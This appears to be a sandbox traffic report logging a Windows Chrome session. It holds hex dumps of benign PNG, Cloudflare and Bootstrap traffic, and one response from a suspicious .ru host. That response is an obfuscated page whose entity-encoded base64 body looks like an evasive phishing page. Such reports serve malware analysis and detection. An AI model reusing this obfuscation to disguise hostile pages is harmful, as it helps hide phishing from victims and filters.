                                                                                                                                                              2024-01-17 16:38:59 UTC545INData Raw: 64 30 33 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 e2 00 00 00 30 08 06 00 00 00 0c e6 a6 f3 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 0c bd 49 44 41 54 78 01 ed 9c 3d 77 1b b9 15 86 47 b6 7a d3 bf c0 4c ca 34 66 4e d2 6b 5c 64 53 9a ee b3 c7 a3 5f 60 fa ab 8d a8 da 1f d2 fe 02 8f 72 d2 9b ee b2 95 c9 7e cf 46 aa dc 65 a9 5f b0 52 5a 7f 30 cf 4b 03 5c 0c 06 43 42 12 87 de 8d 31 e7 8c 81 7b 71 71 2f e6 05 5e 7c 0c 47 de fa 6f ff f7 b3 ac 85 0b a7 3f de 18 fd e7 4f 72 fd f7 ef b3 1f b6 b6 b2 79 7e dd a1 f6 ff 92 5d cb b6 b2 56 9e 61 dd 6d 4d fe 12 02 4d 08 5c 6b 2a 48 fa 84 40 42 60 73 08 24 22 6e 0e eb 14 29 21 d0 88 40 22 62 23 34 a9 20 21 b0 39 04 12 11 37 87 75 8a 94 10 68 44 20 11 b1 11 9a 54 90 10 d8 1c 02 89 88 9b c3 3a 45 4a
                                                                                                                                                              Data Ascii: d03PNGIHDR0sRGBIDATx=wGzL4fNk\dS_`r~Fe_RZ0K\CB1{qq/^|Go?Ory~]VamMM\k*H@B`s$"n)!@"b#4 !97uhD T:EJ
                                                                                                                                                              2024-01-17 16:38:59 UTC1252INData Raw: 18 a3 0f 1f 3e 4c 59 41 6b e6 5a 99 6b ca a4 f8 62 08 98 5d 4e 25 3e 7d 34 61 87 d3 0f ed 9e 34 21 53 e7 2e 15 74 dc d0 64 db e1 be 83 3c ad 38 41 48 2b a2 8f c8 2f 72 ef e9 d3 a7 bd 5f c4 f8 9c 21 71 74 05 3a 71 8a b1 66 52 f7 3a a7 83 4b 57 91 f2 5f 16 01 c8 54 1b 0f f4 35 dd 17 3e c2 30 21 8f 68 71 c9 bd 72 62 4e 44 5c d2 b7 10 a1 58 52 1c 2c 32 e4 ad 75 58 d0 d8 51 f2 62 a6 a0 a3 77 51 1d 91 ee f3 0a bc 67 08 ea 58 a5 ec 17 46 e0 b6 1f 9f 7e 1a fb ba cb c8 69 6b 5a 45 ed 1c f1 86 55 41 08 9d f3 06 56 8e 49 21 ef 85 ec 5d 9f e6 4d 6d e9 ea 52 fe d7 83 80 b6 96 7e 6b 9a 56 43 df 6e 95 9c 56 c4 2a 42 23 57 14 f0 bc aa 2e 5c dd b2 bc 79 49 a3 33 c1 e2 82 cc 93 85 90 32 09 81 06 04 d2 8a e8 00 c3 36 63 c8 e1 ba f2 b6 13 32 4a 2e 1d b3 c6 2c 67 82 c2 9b 35
                                                                                                                                                              Data Ascii: >LYAkZkb]N%>}4a4!S.td<8AH+/r_!qt:qfR:KW_T5>0!hqrbND\XR,2uXQbwQgXF~ikZEUAVI!]MmR~kVCnV*B#W.\yI326c2J.,g5
                                                                                                                                                              2024-01-17 16:38:59 UTC1252INData Raw: c9 a8 ef 1b 44 3c cf 9c d4 d8 0d fd ba c8 79 40 d7 9a 6a 3b fb e7 cf 3f b4 e4 fd 5d f6 b7 9b f3 95 70 f6 af ec 1f 6c 4c ff d0 46 9c ad bf 66 7f 6e c3 af 56 11 48 a6 19 71 31 53 92 7f c0 2d dd e2 a2 13 0b 88 e8 ca 7a 49 33 5d 28 d6 94 61 e6 d6 b6 b0 eb b9 bb f2 df 4d 7a fe 46 9e bc 10 1b e2 67 17 58 6d e5 bb b2 ea f1 3c 39 ba 92 3b 23 3f 25 a9 6c e3 d0 1d 40 c6 db 4c 6c fb 11 98 e6 d4 f7 af d2 57 84 64 fc 8f 58 15 0f bc b2 4a 5b bc b2 b5 8b fa 1d b1 95 ff 81 bb 72 26 fc 4c c2 56 e2 cc 38 7b c2 83 d9 da 91 f9 ec b0 24 11 f9 e6 17 81 ba da 02 d9 ad 9a 19 9c 77 6d b9 52 6c 4a 57 5e 57 9e 81 d2 0b f8 1a 07 74 97 56 b1 42 1d 37 55 e6 77 c4 2e 93 4e a5 58 2b 4e 45 b1 44 c0 f7 18 fb 3d d7 04 b9 6b 65 56 b4 da c7 14 2a 03 cf 42 67 45 26 45 9d e5 be 0b 9d af 8c 5d
                                                                                                                                                              Data Ascii: D<y@j;?]plLFfnVHq1S-zI3](aMzFgXm<9;#?%l@LlWdXJ[r&LV8{$wmRlJW^WtVB7Uw.NX+NED=keV*BgE&E]
                                                                                                                                                              2024-01-17 16:38:59 UTC289INData Raw: 3a 3a c3 54 f4 74 e2 34 60 37 57 69 c0 91 29 78 11 31 c4 5f 4e be cf dd e1 5e 5c b4 6f 2a 9f 3c e7 d8 cc ce 8b 32 32 17 8a e7 56 54 de 8b af d8 39 77 87 98 3d d2 8c b8 c7 4a b9 b4 3d 1b db ef 73 3f ab ea ff 42 82 0e 5b d1 b9 1f ea ca 87 7c dd 26 3d 45 9e 1a ac c7 90 6c 54 af 5d d7 18 a2 96 c6 a7 88 d9 c5 6a ee 93 fc 09 f9 33 eb 73 c9 e4 50 71 4c bd fd 8a 22 42 30 38 f5 cd 39 57 ed d0 b3 cd 2f e2 cf fb 47 c2 16 7f 7d 11 dc 80 7f 36 bd c2 bf 33 fe e0 f8 db 9b f3 0f bd 67 df 67 fa 0b 8f 56 3e fa ce be c9 ae b5 f8 d1 f7 15 00 48 55 13 02 f1 08 a4 ad 69 3c 56 c9 32 21 d0 1a 02 89 88 ad 41 9b 1c 27 04 e2 11 48 44 8c c7 2a 59 26 04 5a 43 20 11 b1 35 68 93 e3 84 40 3c 02 89 88 f1 58 25 cb 84 40 6b 08 24 22 b6 06 6d 72 9c 10 88 47 20 11 31 1e ab 64 99 10 68 0d 81
                                                                                                                                                              Data Ascii: ::Tt4`7Wi)x1_N^\o*<22VT9w=J=s?B[|&=ElT]j3sPqL"B089W/G}63ggV>HUi<V2!A'HD*Y&ZC 5h@<X%@k$"mrG 1dh
                                                                                                                                                              2024-01-17 16:38:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              4192.168.2.449741172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:01 UTC643OUTGET / HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:02 UTC849INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:02 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                              set-cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq; expires=Thu, 18-Jan-2024 16:39:02 GMT; Max-Age=86400; path=/
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6j2j3JNZRI343TpjBhPa3MnEhYyEeIJX3rhrB5VHoXRgvHvsTQ7GW7MTjD5sNzQnNepqNDI2uFDMge5HOFy2Oyei1MGdooVd%2Bm9NjM1A4dHxtyOvy6CdeOy0KXAnMCLU4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8470082ab8c8436f-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:02 UTC520INData Raw: 36 65 66 63 0d 0a 3c 6b 6d 55 73 79 77 73 66 55 71 51 63 61 6f 41 65 55 53 79 77 20 6e 76 71 61 62 6c 56 46 50 74 46 77 6e 73 4f 57 6a 4f 50 73 73 78 53 73 44 3d 22 26 23 38 30 3b 26 23 36 37 3b 26 23 37 30 3b 26 23 36 39 3b 26 23 38 34 3b 26 23 34 38 3b 26 23 37 38 3b 26 23 38 35 3b 26 23 38 37 3b 26 23 38 36 3b 26 23 36 36 3b 26 23 37 30 3b 26 23 37 33 3b 26 23 37 31 3b 26 23 31 30 34 3b 26 23 34 38 3b 26 23 39 38 3b 26 23 38 37 3b 26 23 31 31 39 3b 26 23 34 33 3b 26 23 38 30 3b 26 23 37 31 3b 26 23 31 30 34 3b 26 23 34 38 3b 26 23 39 38 3b 26 23 38 37 3b 26 23 31 31 39 3b 26 23 31 30 33 3b 26 23 39 38 3b 26 23 37 31 3b 26 23 37 30 3b 26 23 31 31 37 3b 26 23 39 30 3b 26 23 31 32 32 3b 26 23 34 38 3b 26 23 31 30 35 3b 26 23 39 30 3b 26 23 38 37 3b 26 23
                                                                                                                                                              Data Ascii: 6efc<kmUsywsfUqQcaoAeUSyw nvqablVFPtFwnsOWjOPssxSsD="&#80;&#67;&#70;&#69;&#84;&#48;&#78;&#85;&#87;&#86;&#66;&#70;&#73;&#71;&#104;&#48;&#98;&#87;&#119;&#43;&#80;&#71;&#104;&#48;&#98;&#87;&#119;&#103;&#98;&#71;&#70;&#117;&#90;&#122;&#48;&#105;&#90;&#87;&#
                                                                                                                                                              2024-01-17 16:39:02 UTC1369INData Raw: 26 23 38 35 3b 26 23 31 32 32 3b 26 23 31 31 39 3b 26 23 31 31 38 3b 26 23 31 30 30 3b 26 23 37 31 3b 26 23 31 30 38 3b 26 23 34 38 3b 26 23 39 38 3b 26 23 37 31 3b 26 23 38 35 3b 26 23 34 33 3b 26 23 38 30 3b 26 23 37 31 3b 26 23 34 39 3b 26 23 31 30 38 3b 26 23 31 30 30 3b 26 23 37 31 3b 26 23 36 39 3b 26 23 31 30 33 3b 26 23 38 39 3b 26 23 35 30 3b 26 23 31 30 34 3b 26 23 31 30 34 3b 26 23 39 39 3b 26 23 31 31 30 3b 26 23 37 38 3b 26 23 31 30 38 3b 26 23 31 30 30 3b 26 23 36 38 3b 26 23 34 38 3b 26 23 31 30 35 3b 26 23 38 36 3b 26 23 38 36 3b 26 23 38 32 3b 26 23 37 31 3b 26 23 37 36 3b 26 23 38 34 3b 26 23 31 30 33 3b 26 23 31 30 35 3b 26 23 38 30 3b 26 23 31 30 36 3b 26 23 31 32 30 3b 26 23 31 31 36 3b 26 23 39 30 3b 26 23 38 38 3b 26 23 38 32 3b 26
                                                                                                                                                              Data Ascii: &#85;&#122;&#119;&#118;&#100;&#71;&#108;&#48;&#98;&#71;&#85;&#43;&#80;&#71;&#49;&#108;&#100;&#71;&#69;&#103;&#89;&#50;&#104;&#104;&#99;&#110;&#78;&#108;&#100;&#68;&#48;&#105;&#86;&#86;&#82;&#71;&#76;&#84;&#103;&#105;&#80;&#106;&#120;&#116;&#90;&#88;&#82;&
                                                                                                                                                              2024-01-17 16:39:02 UTC1369INData Raw: 39 3b 26 23 39 37 3b 26 23 38 33 3b 26 23 35 33 3b 26 23 31 31 33 3b 26 23 39 39 3b 26 23 31 32 31 3b 26 23 37 33 3b 26 23 34 33 3b 26 23 38 30 3b 26 23 36 37 3b 26 23 35 37 3b 26 23 31 32 32 3b 26 23 38 39 3b 26 23 35 31 3b 26 23 37 34 3b 26 23 31 31 32 3b 26 23 39 39 3b 26 23 37 32 3b 26 23 38 31 3b 26 23 34 33 3b 26 23 38 30 3b 26 23 37 31 3b 26 23 31 32 30 3b 26 23 31 31 32 3b 26 23 39 38 3b 26 23 31 30 39 3b 26 23 31 31 35 3b 26 23 31 30 33 3b 26 23 39 39 3b 26 23 31 30 39 3b 26 23 38 36 3b 26 23 31 31 35 3b 26 23 38 30 3b 26 23 38 33 3b 26 23 37 34 3b 26 23 31 32 32 3b 26 23 31 30 30 3b 26 23 37 32 3b 26 23 31 30 38 3b 26 23 31 31 35 3b 26 23 39 30 3b 26 23 38 38 3b 26 23 37 38 3b 26 23 31 31 31 3b 26 23 39 30 3b 26 23 38 37 3b 26 23 38 36 3b 26 23
                                                                                                                                                              Data Ascii: 9;&#97;&#83;&#53;&#113;&#99;&#121;&#73;&#43;&#80;&#67;&#57;&#122;&#89;&#51;&#74;&#112;&#99;&#72;&#81;&#43;&#80;&#71;&#120;&#112;&#98;&#109;&#115;&#103;&#99;&#109;&#86;&#115;&#80;&#83;&#74;&#122;&#100;&#72;&#108;&#115;&#90;&#88;&#78;&#111;&#90;&#87;&#86;&#
                                                                                                                                                              2024-01-17 16:39:02 UTC1369INData Raw: 3b 26 23 37 31 3b 26 23 31 30 38 3b 26 23 31 30 37 3b 26 23 39 30 3b 26 23 37 31 3b 26 23 38 36 3b 26 23 31 31 37 3b 26 23 38 30 3b 26 23 31 30 36 3b 26 23 31 31 39 3b 26 23 31 31 38 3b 26 23 38 39 3b 26 23 38 34 3b 26 23 35 32 3b 26 23 35 36 3b 26 23 39 39 3b 26 23 35 30 3b 26 23 37 38 3b 26 23 31 32 31 3b 26 23 39 37 3b 26 23 38 38 3b 26 23 36 36 3b 26 23 34 38 3b 26 23 38 30 3b 26 23 31 30 35 3b 26 23 31 30 34 3b 26 23 31 32 32 3b 26 23 38 39 3b 26 23 35 31 3b 26 23 37 34 3b 26 23 31 30 38 3b 26 23 39 30 3b 26 23 38 37 3b 26 23 35 32 3b 26 23 31 31 37 3b 26 23 31 30 30 3b 26 23 35 30 3b 26 23 31 30 38 3b 26 23 31 30 37 3b 26 23 31 30 30 3b 26 23 37 31 3b 26 23 31 30 33 3b 26 23 31 30 33 3b 26 23 38 30 3b 26 23 31 30 35 3b 26 23 36 35 3b 26 23 34 38 3b
                                                                                                                                                              Data Ascii: ;&#71;&#108;&#107;&#90;&#71;&#86;&#117;&#80;&#106;&#119;&#118;&#89;&#84;&#52;&#56;&#99;&#50;&#78;&#121;&#97;&#88;&#66;&#48;&#80;&#105;&#104;&#122;&#89;&#51;&#74;&#108;&#90;&#87;&#52;&#117;&#100;&#50;&#108;&#107;&#100;&#71;&#103;&#103;&#80;&#105;&#65;&#48;
                                                                                                                                                              2024-01-17 16:39:02 UTC1369INData Raw: 26 23 39 37 3b 26 23 38 37 3b 26 23 31 30 30 3b 26 23 31 30 34 3b 26 23 31 30 30 3b 26 23 37 31 3b 26 23 35 37 3b 26 23 31 32 31 3b 26 23 37 36 3b 26 23 31 31 30 3b 26 23 31 30 30 3b 26 23 31 30 38 3b 26 23 38 39 3b 26 23 31 30 39 3b 26 23 38 32 3b 26 23 31 32 31 3b 26 23 39 37 3b 26 23 38 38 3b 26 23 39 30 3b 26 23 31 30 38 3b 26 23 39 39 3b 26 23 31 30 35 3b 26 23 36 36 3b 26 23 35 36 3b 26 23 31 30 32 3b 26 23 36 37 3b 26 23 36 36 3b 26 23 35 31 3b 26 23 39 37 3b 26 23 38 37 3b 26 23 35 33 3b 26 23 31 30 37 3b 26 23 39 38 3b 26 23 35 31 3b 26 23 39 39 3b 26 23 31 31 37 3b 26 23 39 30 3b 26 23 37 31 3b 26 23 35 37 3b 26 23 31 30 36 3b 26 23 31 30 30 3b 26 23 38 37 3b 26 23 34 39 3b 26 23 31 30 38 3b 26 23 39 38 3b 26 23 31 31 30 3b 26 23 38 31 3b 26 23
                                                                                                                                                              Data Ascii: &#97;&#87;&#100;&#104;&#100;&#71;&#57;&#121;&#76;&#110;&#100;&#108;&#89;&#109;&#82;&#121;&#97;&#88;&#90;&#108;&#99;&#105;&#66;&#56;&#102;&#67;&#66;&#51;&#97;&#87;&#53;&#107;&#98;&#51;&#99;&#117;&#90;&#71;&#57;&#106;&#100;&#87;&#49;&#108;&#98;&#110;&#81;&#
                                                                                                                                                              2024-01-17 16:39:02 UTC1369INData Raw: 23 38 37 3b 26 23 37 30 3b 26 23 31 31 30 3b 26 23 39 30 3b 26 23 38 38 3b 26 23 37 37 3b 26 23 31 30 33 3b 26 23 37 34 3b 26 23 31 30 35 3b 26 23 38 39 3b 26 23 31 30 33 3b 26 23 31 30 30 3b 26 23 35 30 3b 26 23 31 30 38 3b 26 23 31 31 37 3b 26 23 39 30 3b 26 23 37 31 3b 26 23 35 37 3b 26 23 35 31 3b 26 23 37 36 3b 26 23 31 30 39 3b 26 23 35 33 3b 26 23 31 30 34 3b 26 23 31 30 30 3b 26 23 31 30 39 3b 26 23 31 30 38 3b 26 23 31 31 30 3b 26 23 38 39 3b 26 23 38 38 3b 26 23 38 32 3b 26 23 31 31 38 3b 26 23 39 39 3b 26 23 31 30 35 3b 26 23 35 33 3b 26 23 31 31 35 3b 26 23 38 39 3b 26 23 38 37 3b 26 23 35 33 3b 26 23 31 31 30 3b 26 23 31 30 30 3b 26 23 38 37 3b 26 23 37 30 3b 26 23 31 31 30 3b 26 23 39 30 3b 26 23 38 38 3b 26 23 37 37 3b 26 23 31 31 37 3b 26
                                                                                                                                                              Data Ascii: #87;&#70;&#110;&#90;&#88;&#77;&#103;&#74;&#105;&#89;&#103;&#100;&#50;&#108;&#117;&#90;&#71;&#57;&#51;&#76;&#109;&#53;&#104;&#100;&#109;&#108;&#110;&#89;&#88;&#82;&#118;&#99;&#105;&#53;&#115;&#89;&#87;&#53;&#110;&#100;&#87;&#70;&#110;&#90;&#88;&#77;&#117;&
                                                                                                                                                              2024-01-17 16:39:02 UTC1369INData Raw: 26 23 31 31 37 3b 26 23 38 31 3b 26 23 35 30 3b 26 23 37 30 3b 26 23 31 31 39 3b 26 23 38 39 3b 26 23 38 37 3b 26 23 37 34 3b 26 23 31 31 32 3b 26 23 39 38 3b 26 23 37 31 3b 26 23 31 30 38 3b 26 23 34 38 3b 26 23 39 37 3b 26 23 38 37 3b 26 23 38 36 3b 26 23 31 32 32 3b 26 23 37 36 3b 26 23 31 30 39 3b 26 23 37 38 3b 26 23 31 31 31 3b 26 23 39 39 3b 26 23 31 30 39 3b 26 23 35 37 3b 26 23 31 31 36 3b 26 23 39 30 3b 26 23 38 33 3b 26 23 36 36 3b 26 23 35 36 3b 26 23 31 30 32 3b 26 23 36 37 3b 26 23 36 36 3b 26 23 35 31 3b 26 23 39 37 3b 26 23 38 37 3b 26 23 35 33 3b 26 23 31 30 37 3b 26 23 39 38 3b 26 23 35 31 3b 26 23 39 39 3b 26 23 31 31 37 3b 26 23 39 30 3b 26 23 37 31 3b 26 23 35 37 3b 26 23 31 30 36 3b 26 23 31 30 30 3b 26 23 38 37 3b 26 23 34 39 3b 26
                                                                                                                                                              Data Ascii: &#117;&#81;&#50;&#70;&#119;&#89;&#87;&#74;&#112;&#98;&#71;&#108;&#48;&#97;&#87;&#86;&#122;&#76;&#109;&#78;&#111;&#99;&#109;&#57;&#116;&#90;&#83;&#66;&#56;&#102;&#67;&#66;&#51;&#97;&#87;&#53;&#107;&#98;&#51;&#99;&#117;&#90;&#71;&#57;&#106;&#100;&#87;&#49;&
                                                                                                                                                              2024-01-17 16:39:02 UTC1369INData Raw: 32 3b 26 23 38 36 3b 26 23 38 39 3b 26 23 34 38 3b 26 23 37 38 3b 26 23 31 32 32 3b 26 23 38 33 3b 26 23 31 30 39 3b 26 23 31 30 30 3b 26 23 31 30 34 3b 26 23 38 34 3b 26 23 38 35 3b 26 23 31 30 38 3b 26 23 38 37 3b 26 23 38 33 3b 26 23 37 30 3b 26 23 31 31 32 3b 26 23 31 30 35 3b 26 23 38 35 3b 26 23 31 30 37 3b 26 23 31 30 38 3b 26 23 31 32 32 3b 26 23 39 30 3b 26 23 38 38 3b 26 23 31 30 34 3b 26 23 31 30 34 3b 26 23 31 30 30 3b 26 23 31 31 30 3b 26 23 31 30 34 3b 26 23 35 34 3b 26 23 31 30 31 3b 26 23 35 31 3b 26 23 36 36 3b 26 23 31 31 38 3b 26 23 39 39 3b 26 23 35 30 3b 26 23 31 30 38 3b 26 23 34 38 3b 26 23 39 37 3b 26 23 38 37 3b 26 23 35 37 3b 26 23 31 31 37 3b 26 23 37 39 3b 26 23 31 30 35 3b 26 23 36 36 3b 26 23 31 30 34 3b 26 23 38 39 3b 26 23
                                                                                                                                                              Data Ascii: 2;&#86;&#89;&#48;&#78;&#122;&#83;&#109;&#100;&#104;&#84;&#85;&#108;&#87;&#83;&#70;&#112;&#105;&#85;&#107;&#108;&#122;&#90;&#88;&#104;&#104;&#100;&#110;&#104;&#54;&#101;&#51;&#66;&#118;&#99;&#50;&#108;&#48;&#97;&#87;&#57;&#117;&#79;&#105;&#66;&#104;&#89;&#
                                                                                                                                                              2024-01-17 16:39:02 UTC1369INData Raw: 26 23 31 30 35 3b 26 23 39 30 3b 26 23 31 31 30 3b 26 23 37 37 3b 26 23 31 31 36 3b 26 23 37 38 3b 26 23 38 33 3b 26 23 37 33 3b 26 23 34 33 3b 26 23 38 33 3b 26 23 31 30 36 3b 26 23 31 32 30 3b 26 23 31 32 32 3b 26 23 39 39 3b 26 23 37 31 3b 26 23 37 30 3b 26 23 31 31 37 3b 26 23 37 33 3b 26 23 37 31 3b 26 23 37 38 3b 26 23 31 31 35 3b 26 23 38 39 3b 26 23 38 38 3b 26 23 37 38 3b 26 23 31 32 32 3b 26 23 38 30 3b 26 23 38 33 3b 26 23 37 34 3b 26 23 31 30 36 3b 26 23 39 37 3b 26 23 35 30 3b 26 23 39 30 3b 26 23 36 39 3b 26 23 38 39 3b 26 23 38 36 3b 26 23 31 31 32 3b 26 23 38 36 3b 26 23 38 39 3b 26 23 34 38 3b 26 23 37 38 3b 26 23 31 32 32 3b 26 23 38 33 3b 26 23 31 30 39 3b 26 23 31 30 30 3b 26 23 31 30 34 3b 26 23 38 34 3b 26 23 38 35 3b 26 23 31 30 38
                                                                                                                                                              Data Ascii: &#105;&#90;&#110;&#77;&#116;&#78;&#83;&#73;&#43;&#83;&#106;&#120;&#122;&#99;&#71;&#70;&#117;&#73;&#71;&#78;&#115;&#89;&#88;&#78;&#122;&#80;&#83;&#74;&#106;&#97;&#50;&#90;&#69;&#89;&#86;&#112;&#86;&#89;&#48;&#78;&#122;&#83;&#109;&#100;&#104;&#84;&#85;&#108
                                                                                                                                                              2024-01-17 16:39:02 UTC1369INData Raw: 32 3b 26 23 39 30 3b 26 23 38 38 3b 26 23 31 30 34 3b 26 23 31 30 34 3b 26 23 31 30 30 3b 26 23 31 31 30 3b 26 23 31 30 34 3b 26 23 35 34 3b 26 23 37 33 3b 26 23 31 30 36 3b 26 23 35 32 3b 26 23 31 32 30 3b 26 23 37 39 3b 26 23 38 34 3b 26 23 37 37 3b 26 23 35 31 3b 26 23 37 37 3b 26 23 31 30 36 3b 26 23 36 39 3b 26 23 31 32 30 3b 26 23 37 38 3b 26 23 31 30 36 3b 26 23 38 35 3b 26 23 35 33 3b 26 23 37 38 3b 26 23 36 38 3b 26 23 37 37 3b 26 23 35 33 3b 26 23 37 37 3b 26 23 38 34 3b 26 23 36 35 3b 26 23 31 32 31 3b 26 23 38 30 3b 26 23 36 37 3b 26 23 35 37 3b 26 23 31 32 32 3b 26 23 39 39 3b 26 23 37 31 3b 26 23 37 30 3b 26 23 31 31 37 3b 26 23 38 30 3b 26 23 31 30 39 3b 26 23 35 37 3b 26 23 31 31 36 3b 26 23 38 30 3b 26 23 37 32 3b 26 23 37 38 3b 26 23 31
                                                                                                                                                              Data Ascii: 2;&#90;&#88;&#104;&#104;&#100;&#110;&#104;&#54;&#73;&#106;&#52;&#120;&#79;&#84;&#77;&#51;&#77;&#106;&#69;&#120;&#78;&#106;&#85;&#53;&#78;&#68;&#77;&#53;&#77;&#84;&#65;&#121;&#80;&#67;&#57;&#122;&#99;&#71;&#70;&#117;&#80;&#109;&#57;&#116;&#80;&#72;&#78;&#1


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              5192.168.2.449743104.17.3.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:02 UTC630OUTGET /turnstile/v0/api.js HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:03 UTC320INHTTP/1.1 302 Found
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:02 GMT
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                              location: /turnstile/v0/b/c8377512/api.js
                                                                                                                                                              cache-control: max-age=300, public
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 84700833882c422e-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              6192.168.2.449744151.101.193.2294434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:02 UTC574OUTGET /npm/bootstrap@5.0.2/dist/css/bootstrap.min.css HTTP/1.1
                                                                                                                                                              Host: cdn.jsdelivr.net
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:02 UTC756INHTTP/1.1 200 OK
                                                                                                                                                              Connection: close
                                                                                                                                                              Content-Length: 155845
                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                              Access-Control-Expose-Headers: *
                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                              Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                              Content-Type: text/css; charset=utf-8
                                                                                                                                                              X-JSD-Version: 5.0.2
                                                                                                                                                              X-JSD-Version-Type: version
                                                                                                                                                              ETag: W/"260c5-fByeBXPlzqi603M74vxjqoxo6o0"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:02 GMT
                                                                                                                                                              Age: 3769552
                                                                                                                                                              X-Served-By: cache-fra-eddf8230097-FRA, cache-lga21921-LGA
                                                                                                                                                              X-Cache: HIT, HIT
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
